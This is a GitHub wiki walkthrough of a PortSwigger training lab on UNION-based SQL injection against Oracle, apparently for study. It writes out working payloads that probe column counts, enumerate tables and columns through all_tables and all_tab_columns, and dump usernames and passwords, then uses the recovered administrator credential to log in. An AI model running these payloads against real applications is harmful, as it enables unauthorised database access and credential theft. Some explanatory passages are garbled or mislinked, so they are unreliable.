SQL injection attack, listing the database contents on Oracle - KA4KA4/PortSwigger-SQL-injection-Labs GitHub Wiki

hello lets start

hello, let's start!

access the lab and choose gift category and intercept the request and send it to repeater.

start testing.

first thing we need to make error detect SQL injection. this example we know is that has SQL Injections but in real testing we need to detect if there is sql injection in parameter or not is break and occur error from database, error indicate there is sql injection, sometimes when breaks syntax it differs from website to another. this means we must try adding some functions such as single quote ", double Coutes "", slash / or encoding these queries ('-"-/) something like that.

Note: every parameter is vulnerable until prove reverse

now I sent single quote ' to see what happen.

1

now we get error. note that maybe vulnerable to SQL injection

portswigger facilitate process and give us name of database it's Oracle but in real world while testing you should test every parameter. now we need to select number of columns. but before select number of columns we need to use union select .this a query used to retrieve sensitive information from other columns and set statement in single raws . in oracle the query should refer to dual table . dual is default table inside information scheme in database of oracle .it contains a single row and a single column.

syntax will be as follwing

'UNION+SELECT+NULL,NULL+FROM+DUAL--

  • UNION: This operator takes the results of two or more SELECT statements and combines them into a single result set, discarding any duplicate rows that may exist between the two SELECT statements.

  • SELECT NULL: This is the first SELECT statement in the UNION, which selects a single NULL value in the first column.

  • NULL FROM DUAL: This is the second SELECT statement in the UNION, which uses the DUAL table to select a single NULL value in the second column.

  • --: This is a comment in SQL syntax that indicates the end of the query. Anything after this is ignored.

now we need to test number of columns by add NULL value and end query with from dual . follow me

2

result indicate that there are two columns in table. note if you add 3 NULL value an error will happen because number of columns is not three. it's two.

now we need to detect which column is string. we will add string in each column and send request if response is ok this mean column has datatype string but if we get error this mean column is not string may be anything else.

query will be as follwing

'UNION+SELECT+'asd','asd'+FROM+DUAL--

3

response ok. this mean datatype of two column is string and we can use two columns to extract usernames and password.

now we need to know syntax of oracle database to extract table name then extract username and password columns name.

portswigger has cheat of syntax of databases. check this link https://portswigger.net/web-security/sql-injection/cheat-sheet

another way. we can search on google to extract table names that exist information scheme.

every database while creating. it has static default tables, and every table has static default columns exist in database all of information exist in information scheme.

now this is syntax of oracle database when retrieve table name

4

for more information about oracle information scheme check this link (https://docs.oracle.com/cd/E19078-01/mysql/mysql-refman-5.0/information-schema.html )

now choose The INFORMATION_SCHEMA TABLES Table

6

The TABLES table provides information about tables in databases.

after knowing name of tables and syntax. query will be as following.

'UNION+SELECT+NULL,table_name+FROM+all_tables--

7

  • Explain The query UNION SELECT NULL,table_name FROM all_tables-- is attempting to find the names of all the tables in the database, since all_tables is a special Oracle view that contains a list of all the tables accessible to the current user in the database. Note that this query only retrieves the table names, not the column names as mentioned in your Stackoverflow question.

  • UNION: The UNION keyword combines the results of two SELECT statements into a single result set.

  • SELECT NULL: This statement selects NULL as the only column value in the first result set. This is done to ensure that the first SELECT statement has the same number of columns as the second SELECT statement, which is necessary for the UNION operator to work correctly.

  • table_name FROM all_tables: This statement selects the names of all tables in the database, using the special Oracle view all_tables. The table_name column in all_tables stores the names of all tables in the database.

  • --: This is a comment in SQL syntax that terminates the query to prevent any additional data from executing. Anything that follows -- in the query is ignored.

copy URL and browse link you will see all of tables that exit in oracle database.

result is too much but we just want users table

8

after knowing name of table, we will create new query to know name of username and password of columns names.

go back to this link and search on column https://docs.oracle.com/cd/E19078-01/mysql/mysql-refman-5.0/information-schema.html#tables-table

now choose columns name

9

and will edit the syntax in portswigger cheet https://portswigger.net/web-security/sql-injection/cheat-sheet

10

query will be as follwing

'UNION+SELECT+NULL,COLUMN_NAME+FROM+all_tab_columns+WHERE+table_name='USERS_VLUVKU'--

11

  • Explain:

  • UNION: The UNION keyword combines the results of two SELECT statements into a single result set.

  • SELECT NULL: This statement selects NULL as the only column value in the first result set. This is done to ensure that the first SELECT statement has the same number of columns as the second SELECT statement, which is necessary for the UNION operator to work correctly.

  • COLUMN_NAME FROM all_tab_columns: This statement selects the names of all columns in the database, using the special Oracle view all_tab_columns. The COLUMN_NAME column in all_tab_columns stores the names of all columns in the database.

  • WHERE table_name='USERS_VLUVKU': This statement filters the results to only include columns from the table USERS_VLUVKU. The WHERE clause is used to limit the results to only those that meet a specific condition, in this case, filtering the results to only include columns from the table USERS_VLUVKU.

  • --: This is a comment in SQL syntax that terminates the query to prevent any additional data from executing. Anything that follows -- in the query is ignored.

copy url and brawse link you will see name of columns

PASSWORD_HPWZVP USERNAME_ABETVA

12

now we have table name (USERS_VLUVKU) and username column (USERNAME_ABETVA) and password column (PASSWORD_HPWZVP)

let's create last query to get administrator password.

query as following.

'UNION+SELECT+USERNAME_ABETVA,PASSWORD_HPWZVP+FROM+USERS_VLUVKU--

14

  • Explain: UNION: The UNION keyword combines the results of two SELECT statements into a single result set. SELECT USERNAME_ABETVA,PASSWORD_HPWZVP: This statement selects the values from two columns, USERNAME_ABETVA and PASSWORD_HPWZVP, in the first result set. These are likely the names of columns that store usernames and passwords for user accounts. FROM USERS_VLUVKU: This statement specifies the table from which the data in the first SELECT statement is being retrieved, in this case, USERS_VLUVKU. --: This is a comment in SQL syntax that terminates the query to prevent any additional data from executing. Anything that follows -- in the query is ignored.

now copy link and brawse you will see name of users columns and password

13

administrator | 7xslowm2238yot0mzq1t

to solve the lab login as administrator

15

solved lab thank you 🥇